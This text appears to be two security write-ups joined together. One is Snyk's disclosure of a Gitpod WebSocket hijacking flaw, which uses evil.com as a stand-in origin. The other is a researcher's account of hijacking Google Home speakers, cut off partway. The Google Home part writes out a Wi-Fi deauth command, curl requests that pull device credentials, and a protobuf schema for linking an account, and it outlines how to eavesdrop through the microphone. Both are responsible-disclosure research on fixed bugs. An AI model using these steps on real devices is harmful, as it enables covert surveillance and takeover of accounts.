Gitpod remote code execution 0-day vulnerability via WebSockets

Gitpod remote code execution 0-day vulnerability via WebSockets

Original text by Elliot Ward

TLDR

This article walks us through a current Snyk Security Labs research project focusing on cloud based development environments (CDEs) — which resulted in a full workspace takeover on the Gitpod platform and extended to the user’s SCM account. The issues here have been responsibly disclosed to Gitpod and were resolved within a single working day!

Cloud development environments and Gitpod

As more and more companies begin to leverage cloud-based development environments for benefits such as improved performance, developer experience, consistent development environments, and low setup times, we couldn’t help but wonder about the security implications of adopting these cloud based IDEs.

First, let’s provide a brief overview of how CDEs operate so we can understand the difference between cloud-based and traditional, local-workstation based development — and how it changes the developer security landscape.

In contrast to traditional development, CDEs run on a cloud hosted machine with an IDE backend. This typically provides a web application version of the IDE and support for integrating with a locally installed IDE over SSH, giving users a seamless and familiar experience. When using a CDE, the organization’s code and any supporting services, such as a development database, are hosted within the cloud. Check out the following diagram for a visual representation of information flow in a CDE.

The security risks of locally installed development environments are not new. However, they historically haven’t received much attention from developers. In May 2021, Snyk disclosed vulnerable VS Code extensions that lead to a 1-click data leak or arbitrary command execution. These traditional workstation-based development environments, such as a local instance of VS Code or IntelliJ, carry other information security concerns — including hardware failure, data security, and malware. While these concerns can be addressed by employing Full Disk Encryption, version control, backups, and anti-malware systems, many questions remain unanswered with the adoption of cloud-based development environments: 

  • What happens if a cloud IDE workspace is infected with malware?
  • What happens when access controls are insufficient and allow cross-user or even cross-organization access to workspaces?
  • What happens when a rogue developer exfiltrates company intellectual property from a cloud-hosted machine outside the visibility of the organization’s data loss prevention or endpoint security software?

In a current security research project here at Snyk, we examine the security implications of adopting cloud based IDEs. In this article we present a case study of one of the vulnerabilities discovered during our initial exploration in the Gitpod platform. 

Examining the Gitpod platform

Disclaimer: When it came to looking at cloud IDE solutions for our research, we settled on either self-hosted or cloud-based solutions, where the vendor has a clearly defined security policy providing safe harbor for researchers. 

One of the most popular CDE’s is Gitpod. Its wide adoption and extended feature set — including automated backups, Git integration out of the box, and multiple IDE backends — ensured that Gitpod was among the first products we looked into.

The first stage of our research involved becoming familiar with the basic workflows of Gitpod, setting up an organization, and experimenting with the product while capturing traffic using Burpsuite to observe the various APIs and transactions. We then pulled the Gitpod source code from GitHub to study the inner workings of its APIs, and reviewed any relevant architecture documentation to better understand each of the components and their function. A great resource for this was a video that provided an initial deep dive into the architecture of Gitpod. At a high level, Gitpod leverages multiple microservices deployed in a Kubernetes environment, where each user workspace is deployed to a dedicated ephemeral pod. 

Gitpod’s primary set of external components are concerned with the dashboard, authentication, and the creation and management of workspaces, organizations, and accounts. At its core, the main component here is aptly named server, a TypeScript application that exposes a JSONRPC API over WebSocket that is consumed by a React frontend called dashboard

From the dashboard, it’s easy to integrate with a SCM provider, such as GitHub or Bitbucket, to import a repository and spin up a development environment — which then serves the source code and provides a working Git environment. Once the workspace is provisioned, it is made accessible via 

SSH
 and 
HTTPS
 on a subdomain of gitpod.io (i.e 
https://[WORKSPACE_NAME].[CLUSTER_NAME].gitpod.io
) through a Golang-based component called ws-proxy

The security vulnerability that was discovered through our research relates primarily to the server component and the JSONRPC served over a WebSocket connection, which ultimately led to a workspace takeover in Gitpod.

Technical details

WebSockets and Same Origin Policy

WebSocket is a technology that allows for real-time, two-way communication between a client (typically a web browser) and a server. It enables a persistent connection between the client and server, allowing for continuous “real-time” data transfer without the need for repeated HTTP requests. 

An interesting aspect of WebSockets from a security perspective, is that a browser security mechanism, the Same Origin Policy (SOP), does not apply. This is the security control which prevents a website from issuing an AJAX request to another website and being able to read the response. If this were possible, it would present a security concern because browsers typically submit cookies along with every request (even for Cross Origin requests, such as CSRF related attacks). Without SOP, any website would be able to issue requests to foreign websites and obtain your data from other domains.

This leads us to the vulnerability class known as Cross-Site WebSocket Hijacking. This attack is similar to a combination of a Cross-Site Request Forgery and CORS misconfiguration. When a WebSocket handshake relies solely upon HTTP cookies for authentication, a malicious website is able to instantiate a new WebSocket connection to the vulnerable application, allowing an attacker to both send and receive data through the connection.

When reviewing an application with WebSocket connections, it’s always worth examining this in depth. Let’s take a look at the WebSocket request for the Gitpod server.

In normal circumstances, the connection is successfully upgraded to a WebSocket and communication begins. There was no additional authentication taking place within the WebSocket exchange itself, and the JSONRPC can be invoked via the WebSocket connection.

So far, we’ve found no additional authentication taking place within the established channel — a good sign for any potential attackers. Now, let’s verify that no additional Origin checks are taking place by taking a handshake we have observed and tampering with the Origin header.

This looks promising! It seems that the domain 

evil.com
 is able to issue Cross-Origin WebSocket requests to 
gitpod.io
. However, another security mechanism introduces a challenge.

SameSite Cookie bypass

SameSite cookies are a fairly recent addition, providing partial mitigation against Cross-Site Request Forgery (CSRF) attacks. While not everyone has adopted them, most popular browsers have made the default value for all cookies which do not explicitly disable 

SameSite
 to be 
Lax
. So while the underlying vulnerability is present, without a bypass for 
SameSite
 cookies our attack would largely be theoretical and only work against a subset of outdated and niche browsers.

So what is a 

site
 in the context of 
SameSite
? Simply put, the site corresponds to the combination of the scheme and the registrable domain (if any) of the origin’s host. If we look at the specifications for 
SameSite
 we can see that subdomains are not considered. This is more relaxed than the specification of an Origin used by the Same Origin Policy, which is comprised of a scheme + host (including subdomains) + port (eg: https://security.snyk.io:8443).

Earlier, we observed that the workspace was exposed via a subdomain on 

gitpod.io
. In the context of 
SameSite
, the workspace URL is considered to be the same site as 
gitpod.io
. So, it should be possible for one workspace to issue a cross-domain 
SameSite
 request to a 
*.gitpod.io
 domain with the original user’s cookies attached. Let’s see if we can leverage an attacker controlled workspace to serve a WebSocket Hijacking payload. 

To first verify that the cookies are indeed transmitted and the WebSocket communication is successfully achieved, let’s open the browser console from a workspace and attempt to initiate a WebSocket connection.

As we can see in the above screenshot, we attempt to open a new WebSocket connection and, once open, submit a JSONRPC request. We can see in the console output that a message has been received containing the result of our request, confirming that the cookies are submitted and the origin is permitted to open a websocket to 

gitpod.io
.

We now need a way to serve JavaScript from the workspace that can be accessed by a Gitpod user. When looking through the features available, it is possible to expose ports in the workspace and make them accessible using a command line utility called 

gitpod-cli
 — available on the path inside the workspace by typing 
gp
. We can invoke 
gp ports expose 8080
, and then set up a basic Python web server using 
python -m http.server 8080
. This in turn creates a new subdomain where the exposed port can be accessed as shown below.

However, the connection failed. This is somewhat concerning and requires more investigation. Here we open the source code and start looking for what could be causing the problem. We found the following regular expression pattern, which appears to be used to extract the workspace name from the URL.

The way this matching is performed results in the wrong workspace name being extracted, as demonstrated in the following screenshot:

So, it looks like we can’t serve our content from an exposed port inside the Gitpod hosted workspace and we need another way. By now we already know that we have privileged access to a machine that’s running the VS Code service and is serving requests issued to our workspace URL — so can we abuse this in some way?

The initial idea was to terminate the 

vscode
 process and start a Python web server to serve an HTML file. Unfortunately, this did not work and resulted in the workspace being restarted. This appeared to be performed by a local service 
supervisor
. While testing this approach we noticed that when we terminated the process without binding another process to the VS Code port, the 
supervisor
 service will automatically restart the 
vscode
 process, resulting in a brief hang to the UI without a full restart of the workspace.

This brought a promising idea. Can we patch VS Code to serve a built-in exploit for us?

Patching VS Code was relatively easy. By comparing the original VS Code server source code to the distributed version, we quickly found a convenient location to serve the exploit.

VS Code contains an API endpoint at 

/version
, which returns the commit of the current version:

We modified it so that the correct 

Content-Type
 of 
text/html
 and the contents of an HTML file were returned. Now, we terminated the 
vscode
 process, allowing our newly introduced changes to load into a newly spawned VS Code process instance:

Finally, we can leverage the JSONRPC methods 

getLoggedInUser
getGitpodTokens
getOwnerToken
, and 
addSSHPublicKey
 to build a payload that grants us full control over the user’s workspaces when an unsuspecting Gitpod user visits our link!

Here it is in action:

We can see that we’ve been able to extract some sensitive information about the user account, and are notified that our SSH key has been added to the account. Let’s see if we can SSH to the workspace:

Mission successful! As shown above, we have full access to the user’s workspaces after they’ve visited a link we sent them!

Timeline

  • Mon, Feb. 13, 2023 — Vulnerability disclosed to vendor
  • Mon, Feb. 13, 2023 — Vendor acknowledges vulnerability
  • Tue, Feb. 14, 2023 — New version released and deployed to production SaaS Gitpod instance
  • Tue, Feb. 22, 2023 — CVE-2023-0957 assigned
  • Wed, Mar. 1, 2023 — Vendor releases new version for Gitpod Self-Hosted and issues advisory

Summary

In this post, we presented the first findings from our current research into Cloud Development Environments (CDEs) — which allowed a full account takeover through visiting a link, exploiting a commonly misunderstood vulnerability (WebSocket Hijacking), and leveraging a practical SameSite cookie bypass. As cloud developer workspaces are becoming increasingly popular, it’s important to consider the additional risks that are introduced.

We would like to praise Gitpod for their fantastic turnaround on addressing this security vulnerability, and look forward to presenting more of our findings on cloud-based remote development solutions in the near future.

Turning Google smart speakers into wiretaps for $100k

Turning Google smart speakers into wiretaps for $100k

Original text by Matt Kunze

Summary

I was recently rewarded a total of $107,500 by Google for responsibly disclosing security issues in the Google Home smart speaker that allowed an attacker within wireless proximity to install a “backdoor” account on the device, enabling them to send commands to it remotely over the Internet, access its microphone feed, and make arbitrary HTTP requests within the victim’s LAN (which could potentially expose the Wi-Fi password or provide the attacker direct access to the victim’s other devices). These issues have since been fixed.

(Note: I tested everything on a Google Home Mini, but I assume that these attacks worked similarly on Google’s other smart speaker models.)

Investigation

I was messing with the Google Home and noticed how easy it was to add new users to the device from the Google Home app. I also noticed that linking your account to the device gives you a surprising amount of control over it.

Namely, the “routines” feature allows you to create shortcuts for running a series of other commands (e.g. a “good morning” routine that runs the commands “turn off the lights” and “tell me about the weather”). Through the Google Home app, routines can be configured to start automatically on your device on certain days at certain times. Effectively, routines allow anyone with an account linked to the device to send it commands remotely. In addition to remote control over the device, a linked account also allows you to install “actions” (tiny applications) onto it.

When I realized how much access a linked account gives you, I decided to investigate the linking process and determine how easy it would be to link an account from an attacker’s perspective.

So… how would one go about doing that? There are a bunch of different routes to explore when reverse engineering an IoT device, including (but not limited to):

  1. Obtaining the device’s firmware by dumping it or downloading it from the vendor’s website
  2. Static analysis of the app that interfaces with the device (in this case, the “Google Home” Android app), e.g. using Apktool or JADX to decompile it
  3. Dynamic analysis of the app during runtime, e.g. using Frida to hook Java methods and print info about internal state
  4. Intercepting the communications between the app and the device (or between the app/device and the vendor’s servers) using a “man-in-the-middle” (MITM) attack

Obtaining firmware is particularly difficult in the case of Google Home because there are no debugging/flashing pins on the device’s PCB so the only way to read the flash is to desolder the NAND chip. Google also does not publicly provide firmware image downloads. As shown at DEFCON though, it is possible.

However, in general, when reverse engineering things, I like to start with a MITM attack if possible, since it’s usually the most straightforward path to gaining some insight into how the thing works. Typically IoT devices use standard protocols like HTTP or Bluetooth for communicating with their corresponding apps. HTTP in particular can be easily snooped using tools like mitmproxy. I love mitmproxy because it’s FOSS, has a nice terminal-based UI, and provides an easy-to-use Python API.

Since the Google Home doesn’t have its own display or user interface, most of its settings are controlled through the Google Home app. A little Googling revealed that some people had already begun to document the local HTTP API that the device exposes for the Google Home app to use. Google Cast devices (including Google Homes and Chromecasts) advertise themselves on the LAN using mDNS, so we can use 

dns-sd
 to discover them:

$ dns-sd -B _googlecast._tcp
Browsing for _googlecast._tcp
DATE: ---Fri 05 Aug 2022---
15:30:15.526  ...STARTING...
Timestamp     A/R    Flags  if Domain               Service Type         Instance Name
15:30:15.527  Add        3   6 local.               _googlecast._tcp.    Chromecast-997113e3cc9fce38d8284cee20de6435
15:30:15.527  Add        3   6 local.               _googlecast._tcp.    Google-Nest-Hub-d5d194c9b7a0255571045cbf615f7ffb
15:30:15.527  Add        3   6 local.               _googlecast._tcp.    Google-Home-Mini-f09088353752a2e56bddbb2a27ec377

We can use 

nmap
 to find the port that the local HTTP API is running on:

$ nmap 192.168.86.29
Starting Nmap 7.91 ( https://nmap.org ) at 2022-08-05 15:41
Nmap scan report for google-home-mini.lan (192.168.86.29)
Host is up (0.0075s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE
8008/tcp  open  http
8009/tcp  open  ajp13
8443/tcp  open  https-alt
9000/tcp  open  cslistener
10001/tcp open  scp-config

We see HTTP servers on port 8008 and 8443. According to the unofficial documentation I linked above, 8008 is deprecated and only 8443 works now. (The other ports are for Chromecast functionality, and some unofficial documentation for those is available elsewhere on the Internet.) Let’s try issuing a request:

$ curl -s --insecure https://192.168.86.29:8443/setup/eureka_info?params=settings
{"settings":{"closed_caption":{},"control_notifications":1,"country_code":"US","locale":"en-US","network_standby":0,"system_sound_effects":true,"time_format":1,"timezone":"America/Chicago","wake_on_cast":1}}

(We use 

--insecure
 because the device sends a self-signed certificate, which the Google Home app is configured to trust, but my computer is not.)

Ok, we got the device’s settings. However, the docs say that most API endpoints require a 

cast-local-authorization-token
. Let’s try something more interesting, rebooting the device:

$ curl -i --insecure -X POST -H 'Content-Type: application/json' -d '{"params":"now"}' https://192.168.86.29:8443/setup/reboot
HTTP/1.1 401 Unauthorized
Access-Control-Allow-Headers:Content-Type
Cache-Control:no-cache
Content-Length:0

Indeed, it’s rejecting the request because we’re not authorized. So how do we get the token? Well, the docs say that you can either extract it from the Google Home app’s private app data directory (if your phone is rooted), or you can use a script that takes your Google username and password as input, calls the API that the Google Home app internally uses to get the token, and returns the token. Both of these methods require that you have an account that’s already been linked to the device, though, and I wanted to figure out how the linking happens in the first place. Presumably, this token is being used to prevent an attacker (or malicious app) on the LAN from accessing the device. Therefore, it surely takes more than just basic LAN access to link an account and get the token, right…? I searched the docs but there was no mention of account linking. So I proceeded to investigate the matter myself.

Setting up the proxy

Intercepting unencrypted HTTP traffic with mitmproxy on Android is as simple as starting the proxy server then configuring your phone (or just the target app) to route all of its traffic through the proxy. However, the unofficial local API documentation said that Google had recently started using HTTPS. Also, I wanted to be able to intercept not only the traffic between the app and the Google Home device, but also between the app and Google’s servers (which is definitely HTTPS). I thought that since the linking process involved Google accounts, parts of the process might happen on the Google server, rather than on the device.

Intercepting HTTPS traffic on Android is a little trickier, but usually not terribly difficult. In addition to configuring the proxy settings, you also need to make the app trust mitmproxy’s root CA certificate. You can install new CAs through Android Settings, but annoyingly as of Android 7 apps using the system-provided networking APIs will no longer automatically trust user-added CAs. If you have a rooted Android phone, you can modify the system CA store directly (located at 

/system/etc/security/cacerts
). Alternatively, you could manually patch the individual app. However, sometimes even that isn’t enough as some apps employ “SSL pinning” to ensure that the certificate used for SSL matches the one they were expecting. If the app uses the system-provided pinning APIs (
javax.net.ssl
) or uses a popular HTTP library (e.g. OkHttp), it’s not hard to bypass; just hook the relevant methods with Frida or Xposed. While Xposed and the full version of Frida both require root, Frida Gadget can be used without root. If the app is using a custom pinning mechanism, you’ll have to reverse engineer it and manually patch it out.

Patching and repacking the Google Home app isn’t an option because it uses Google Play Services OAuth APIs (which means the APK needs to be signed by Google or it’ll crash), so root access is necessary to intercept its traffic. Since I didn’t want to root my primary phone, and emulators tend to be clunky, I decided to use an old spare phone I had lying around. I rooted it using Magisk and modified the system CA store to include mitmproxy’s CA, but this wasn’t sufficient as the Google Home app appeared to be utilizing SSL pinning. To bypass the pinning, I used a Frida script I found on GitHub.

I could now see all of the encrypted traffic showing up in mitmproxy:

Even the traffic between the app and device was being captured. Cool!

Alright, so let’s observe what happens when a new user links their account to the device. I already had my primary Google account linked, so I created a new account as the “attacker”. When I opened the Google Home app and signed in under the new account (making sure I was connected to the same Wi-Fi network as the device), the device showed up under “Other devices”, and when I tapped on it, I was greeted with this screen:

I pressed the button and it prompted me to install the Google Search app to continue. I guess the Voice Match setup is done through that app instead. But as an attacker I don’t care about adding my voice to the device; I only want to link my account. So is it possible to link an account without Voice Match? I thought that it must be, since the initial device setup was done entirely within the Home app, and I wasn’t required to enable Voice Match on my primary account. I was about to perform a factory reset and observe the initial account link, but then I realized something.

Much of the internal architecture of Google Home is shared with Chromecast devices. According to a DEFCON talk, Google Home devices use the same operating system as Chromecasts (a version of Linux). The local API seems to be the similar, too. In fact, the Home app’s package name ends with 

chromecast.app
, and it used to just be called “Chromecast”. Back then, its only function was to set up Chromecast devices. Now it’s responsible for setting up and managing not just Chromecasts, but all of Google’s smart home devices.

Anyway, why not just try observing how the Chromecast link process works, then try to replicate it for use with the Google Home? It’s bound to be simpler, because Chromecasts don’t support Voice Match (nor the Google Assistant, for that matter). Luckily, I also had a few Chromecasts lying around. I plugged in one and found it within the Home app:

All I had to do was tap the “Enable voice control and more” banner and confirm, and then my account was linked! Ok, let’s see what happened on the network side:

We see a POST request to a 

/deviceuserlinksbatch
 endpoint on 
clients3.google.com
:

It’s a binary payload, but we can immediately see that it contains some device details (e.g. the device’s name, “Office TV”). We see that the 

content-type
 is 
application/protobuf
Protocol Buffers is Google’s binary data serialization format. Like JSON, data is stored in pairs of keys and values. The client and server exchanging protobuf data both have a copy of the 
.proto
 file, which defines the field names and data types (e.g. 
uint32
bool
string
, etc). During the encoding process, this data is stripped out, and all that remains are the field numbers and wire types. Fortunately, the wire types translate pretty directly back to the original data types (there are usually only a few possibilities as to what the original data type could have been based on the wire type). Google provides a command-line tool called 
protoc
 that allows us to encode and decode protobuf data. The 
--decode_raw
 option tells 
protoc
 to decode without the 
.proto
 file by guessing what the data types are. This raw decoding is usually enough to understand the data structure, but if it doesn’t look right, you could create your own 
.proto
 with your data type guesses, try to decode, and if it still doesn’t make sense, keep adjusting the 
.proto
 until it does.

In our case, 

--decode_raw
 produces a perfectly readable output:

$ protoc --decode_raw < deviceuserlinksbatch
1 {
  1: "590C[...]"
  2: "MIIDojCCAoqgAwIBAgIEVcQZjzANBgkqhkiG9w0BAQUFADB5MQswCQYDVQQGEwJVUzETMBEGA1UECAwKQ2FsaWZvcm5pYTEWMBQGA1UEBwwNTW91bnRhaW4gVmlldzETMBEGA1UECgwKR29vZ2xlIEluYzENMAsGA1UECwwEQ2FzdDEZMBcGA1UEAwwQQ2hyb21lY2FzdCBJQ0EgMzAeFw0xNTA4MDcwMjM1NTlaFw0zNTA4MDIwMjM1NTlaMHwxEzARBgNVBAoMCkdvb2dsZSBJbmMxDTALBgNVBAsMBENhc3QxFjAUBgNVBAcMDU1vdW50YWluIFZpZXcxCzAJBgNVBAYTAlVTMRMwEQYDVQQIDApDYWxpZm9ybmlhMRwwGgYDVQQDDBMzVzM3OTkgRkE4RkNBMzJDRjBEMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAleog/oEXK6PKyGHDIYcDwT2Xl8GLOFuhxQh/K+dTahxex9+4mLAXx5v2s75Iwv9jcXEpD5NTvjNXx20B0/rfpYORHbcm3UEwFWGnP5uvKIyLar+rC7Az5ZPzPXMx7xX6Br68/gOXMGJd17OG/m0rduBZNjmasBb7+Zu8jS38cv+N3S7yTobJbagrHxIufa7gX+rO2f3/jF2EutgcA4lIm5r/2J34fkYTMXnxElJCUv/b1COuk0FZTei4mooJ+TvcQE2ljgHOSvzGnZuT+QWch8TyRjIjKuIK4dB1UIcSvmQoq9PTbfzWCTcW1fREdPtnta6pyWIzmoJ9+3AhVnWAhwIDAQABoy8wLTAJBgNVHRMEAjAAMAsGA1UdDwQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDAjANBgkqhkiG9w0BAQUFAAOCAQEAv11SILN9BfcUthEFq/0NJYnNIFoza21T1BR9qYymFKtUGOplFav00drHziTzUUCNUzbLGnR/yKXxXYlgUOlscEIHxN0+11tvWslHQk7Xgz2RUerBXy9l+vSwp87F8YVECny8lMFZi0T6hHUvtuM6O9qovQKS6ORx3GmZKlNOsNspPnF8IVpN+KtIiopL6vf84iCpbx+dQoOfUOZsbZ+XSxwT34yeNFXqdAIFwP1maMmPZZYnQrDYyUdyowYzk48fDG2QDhFf7dLjtCngcQ83MWWU5nx9On67hnj2VeFGKWsner4cwjs0+iVafUGiWD0tZejVXHSrR7TBouqOf9eG6Q=="
  6: "Office TV"
  7: "b"
  8: 0
  9 {
    1: 1
    2: 0
  }
  10: 2
  12: 0
}

Looks like the link request payload mainly consists of three things: device name, certificate, and “cloud ID”. I quickly recognized these values from the earlier 

/setup/eureka_info
 local API requests. So it appears that the link process is:

  1. Get the device’s info through its local API
  2. Send a link request to the Google server along with this info

I wanted to use mitmproxy to re-issue a modified version of the request, replacing my Chromecast’s info with the Google Home’s info. I would eventually want to create a 

.proto
 file so I could use 
protoc --encode
 to create link requests from scratch, but at that point I just wanted to quickly test to see if it would work. I figured I could replace any strings in the binary payload without causing any problems as long as they were the same length. The cloud ID and cert were the same lengths, but the name (“Office speaker”) was not, so I renamed the device in the Home app to make it that way. Then I issued the modified request, and it appeared to work. The Google Home’s settings were unlocked in the Home app. Behind the scenes, I saw in mitmproxy that the device’s local auth token was being sent along with local API requests.

Python re-implementation

The next thing I wanted to do is re-implement the link process with a Python script so I didn’t have to bother with the Home app any more.

To get the required device info, we just need to issue a request like:

GET https://[Google Home IP]:8443/setup/eureka_info?params=name,device_info,sign

Re-implementing the actual link request was a tad harder. First I examined the script mentioned by the unofficial local API docs that calls Google’s cloud APIs. It uses a library called gpsoauth which implements Android’s Google login flow in Python. Basically, it turns your Google username and password into OAuth tokens, which can be used to call undocumented Google APIs. It’s being used by some unofficial Python clients for Google services, like gkeepapi for Google Keep.

I used mitmproxy and gpsoauth to figure out and re-implement the link request. It looks like this:

POST https://clients3.google.com/cast/orchestration/deviceuserlinksbatch?rt=b

Authorization: Bearer [token from gpsoauth]
[...some uninteresting headers added by the Home app...]
Content-Type: application/protobuf

[device info protobuf payload, described earlier]

To create the protobuf payload, I made a simple 

.proto
 file for the link request so I could use 
protoc --encode
. I gave the fields I knew descriptive names (e.g. 
device_name
), and the unknown fields generic names:

syntax = "proto2";

message LinkDevicePayload {
    message Payload {
        message Data {
            required uint32 i1 = 1;
            required uint32 i2 = 2;
        }
        required string device_id = 1;
        required string device_cert = 2;
        required string device_name = 6;
        required string s7 = 7;
        required uint32 i8 = 8;
        required Data d = 9;
        required uint32 i10 = 10;
        required uint32 i12 = 12;
    }
    required Payload p = 1;
}

As a basic smoke test, I used this 

.proto
 to encode a message with the same values as the message I captured from the Home app, and made sure that the binary output was the same.

Putting it all together, I had a Python script that takes your Google credentials and an IP address as input and uses them to link your account to the Google Home device at the provided IP.

Further investigation

Now that I had my Python script, it was time to think from the perspective of an attacker. Just how much control over the device does a linked account gives you, and what are some potential attack scenarios? I first targeted the routines feature, which allows you to execute voice commands on the device remotely. Doing some more research into previous attacks on Google Home devices, I encountered the “Light Commands” attack, which provided some inspiration for coming up with commands that an attacker might use:

  • Control smart home switches
  • Open smart garage doors
  • Make online purchases
  • Remotely unlock and start certain vehicles
  • Open smart locks by stealthily brute forcing the user’s PIN number

I wanted to go further though and come up with an attack that would work on all Google Home devices, regardless of how many other smart devices that the user has. I was trying to come up with a way to use a voice command to activate the microphone and exfiltrate the data. Perhaps I could use voice commands to load an application onto the device which opens the microphone? Looking at the “conversational actions” docs, it seemed possible to create an app for the Google Home and then invoke it on a linked device using the command “talk to my test app”. But these “apps” can’t really do much. They don’t have access to the raw audio from the microphone; they only get a transcription of what the user says. They don’t even run on the device itself. Rather, the Google servers talk to your app via webhooks on the device’s behalf. The “smart home actions” seemed more interesting, but that’s something I explored later.

All of a sudden it hit me: these devices support a “call [phone number]” command. You could effectively use this command to tell the device to start sending data from its microphone feed to some arbitrary phone number.

Creating malicious routines

The interface for creating a routine within the Google Home app looks like this:

With the help of mitmproxy, I learned that this is actually just a WebView that embeds the website 

https://assistant.google.com/settings/routines
, which loads fine in a normal web browser (as long as you’re logged in to a Google account). This made reverse engineering it a little easier.

I created a routine to execute the command “call [my phone number]” on Wednesdays at 8:26 PM (it was currently a Wednesday, at 8:25 PM). For routines that run automatically at certain times, you need to specify a “device for audio” (a device to run the routine on). You can choose from a list of devices linked to your account:

A minute later, the routine executed on my Google Home, and it called my phone. I picked up the phone and listened to myself talking through the Google Home’s microphone. Pretty cool!

(Later through inspecting network requests, I found that you can specify not only the hour and minute to activate the routine at, but also the precise second, which meant I only had to wait a few seconds for my routines to activate, rather than about a minute.)

An attack scenario

I had a feeling that Google didn’t intend to make it so easy to access the microphone feed on the Google Home remotely. I quickly thought of an attack scenario:

Attacker wishes to spy on victim.

  1. Victim installs attacker’s malicious Android app.
  2. App detects a Google Home on the network via mDNS.
  3. App uses the basic LAN access it’s automatically granted to silently issue the two HTTP requests necessary to link the attacker’s account to the victim’s device (no special permissions necessary).

Attacker can now spy on the victim through their Google Home.

This still requires social engineering and user interaction, though, which isn’t ideal from an attacker’s perspective. Can we make it cooler?

From a more abstract point of view, the combined device information (name, cert, and cloud ID) basically acts as a “password” that grants remote control of the device. The device exposes this password over the LAN through the local API. Are there other ways for an attacker to access the local API?

In 2019, “CastHack” made the news, as it was discovered that thousands of Google Cast devices (including Google Homes) were exposed to the public Internet. At first it was believed that the issue was these devices’ use of UPnP to automatically open ports on the router related to casting (8008, 8009, and 8443). However, it appears that UPnP is only used by Cast devices for local discovery, not for port forwarding, so the likely cause was a widespread networking misconfiguration (that might be related to UPnP somehow).

The people behind CastHack didn’t realize the true level of access that the local API provides (if combined with cloud APIs):

What can hackers do with this?

Remotely play media on your device, rename your device, factory reset or reboot the device, force it to forget all wifi networks, force it to pair to a new bluetooth speaker/wifi point, and so on.

(These are all local API endpoints, documented by the community already. This was also before the local API started requiring an auth token.)

What CAN’T hackers do with this?

Assuming the Chromecast/Google Home is the only problem you have, hackers CANNOT access other devices on the network or sniff information besides WIFI points and Bluetooth devices. They also don’t have access to your personal Google account, nor the Google Home’s microphone.

There are services like Shodan that allow you to scan the Internet for open ports and vulnerable devices. I was able to find hundreds of Cast devices with port 8443 (local API) publicly exposed using some simple search queries. I didn’t pursue this for very long though, because ultimately bad router configuration is not something Google can fix.

While I was reading about CastHack, however, I encountered articles all the way back from 2014 (!) about the “RickMote”, a PoC contraption developed by Dan Petro, security researcher at Bishop Fox, that hijacks nearby Chromecasts and plays “Never Gonna Give You Up” on YouTube. Petro discovered that, when a Chromecast loses its Internet connection, it enters a “setup mode” and creates its own open Wi-Fi network. The intended purpose is to allow the device’s owner to connect to this network from the Google Home app and reset the Wi-Fi settings (in the event that the password was changed, for example). The “RickMote” takes advantage of this behavior.

It turns out that it’s usually really easy to force nearby devices to disconnect from their Wi-Fi network: just send a bunch of “deauth” packets to the target device. WPA2 provides strong encryption for data frames (as long as you choose a good password). However, “management” frames, like deauthentication frames (which tell clients to disconnect) are not encrypted. 802.11w and WPA3 support encrypted management frames, but the Google Home Mini doesn’t support either of these. (Even if it did, the router would need to support them as well for it to work, and this is rare among consumer home routers at this time due to potential compatibility issues. And finally, even if both the device and router supported them, there are still other methods for an attacker to disrupt your Wi-Fi. Basic channel jamming is always an option, though this requires specialized, illegal hardware. Ultimately, Wi-Fi is a poor choice for devices that must be connected to the Internet at all times.)

I wanted to check if this “setup mode” behavior was still in use on the Google Home. I installed 

aircrack-ng
 and used the following command to launch a deauth attack:

aireplay-ng --deauth 0 -a [router BSSID] -c [device MAC address] [interface]

My Google Home immediately disconnected from the network and then made its own:

I connected to the network and used 

netstat
 to get the router’s IP (the router being the Google Home), and saw that it assigned itself the IP 
192.168.255.249
. I issued a local API request to see if it would work:

$ curl -s --insecure https://192.168.255.249:8443/setup/eureka_info?params=name,device_info,sign | python3 -m json.tool
{
    "device_info": {
        [...]
        "cloud_device_id": "590C[...]",
        [...]
    },
    "name": "Office speaker",
    "sign": {
        "certificate": "-----BEGIN CERTIFICATE-----\nMIID[...]\n-----END CERTIFICATE-----\n",
        [...]
    }
}

I was shocked to see that it did! With this information, it’s possible to link an account to the device and remotely control it.

A cooler attack scenario

Attacker wishes to spy on victim. Attacker can get within wireless proximity of the Google Home (but does NOT have the victim’s Wi-Fi password).

  1. Attacker discovers victim’s Google Home by listening for MAC addresses with prefixes associated with Google Inc. (e.g. 
    E4:F0:42
    ).
  2. Attacker sends deauth packets to disconnect the device from its network and make it enter setup mode.
  3. Attacker connects to the device’s setup network and requests its device info.
  4. Attacker connects to the Internet and uses the obtained device info to link their account to the victim’s device.

Attacker can now spy on the victim through their Google Home over the Internet (no need to be within proximity of the device anymore).

What else can we do?

Clearly a linked account gives a tremendous amount of control over the device. I wanted to see if there was anything else an attacker could do. We were now accounting for attackers that aren’t already on the victim’s network. Would it be possible to interact with (and potentially attack) the victim’s other devices through the compromised Google Home? We already know that with a linked account you can:

  • Get the local auth token and change device settings through the local API
  • Execute commands on the device remotely through “routines”
  • Install “actions”, which are like sandboxed applications

Earlier I looked into “conversational actions” and determined that these are too sandboxed to be useful as an attacker. But there is another type of action: “smart home actions”. Device manufacturers (e.g. Philips) can use these to add support for their devices to the Google Home platform (e.g. when the user says “turn on the lights”, their Philips Hue light bulbs will receive a “turn on” command).

One thing I found particularly interesting while reading the documentation was the “Local Home SDK”. Smart home actions used to only run through the Internet (like conversational actions), but Google had recently (April 2020) introduced support for running these locally, improving latency.

The SDK lets you write a local fulfillment app, using TypeScript or JavaScript, that contains your smart home business logic. Google Home or Google Nest devices can load and run your app on-device. Your app communicates directly with your existing smart devices over Wi-Fi on a local area network (LAN) to fulfill user commands, over existing protocols.

Sounded promising. I looked into how it works though and it turns out that these local home apps don’t have direct LAN access. You can’t just connect to any IP you want; rather, you need to specify a “scan configuration” using mDNS, UPnP or UDP broadcast. The Google Home scans the network on your behalf, and if any matching devices are found, it will return a JavaScript object that allows your app to interact with the device over TCP/UDP/HTTP.

Is there any way around this? I noticed that the docs said something about debugging using Chrome DevTools. It turns out that when a local home app is running in testing mode (deployed to the developer’s own account), the Google Home opens port 9222 for the Chrome DevTools Protocol (CDP). CDP access provides complete control over the Chrome instance. For example, you can open or close tabs, and intercept network requests. That got me thinking, maybe I could provide a scan configuration that instructs the Google Home to scan for itself, so I would be able to connect to CDP, take control of the Chrome instance running on the device, and use it to make arbitrary requests within the LAN.

I created a local home app using my linked account and set up the scan config to search for the 

_googlecast._tcp.local
 mDNS service. I rebooted the device, and the app loaded automatically. It quickly found itself and I was able to issue HTTP requests to 
localhost
!

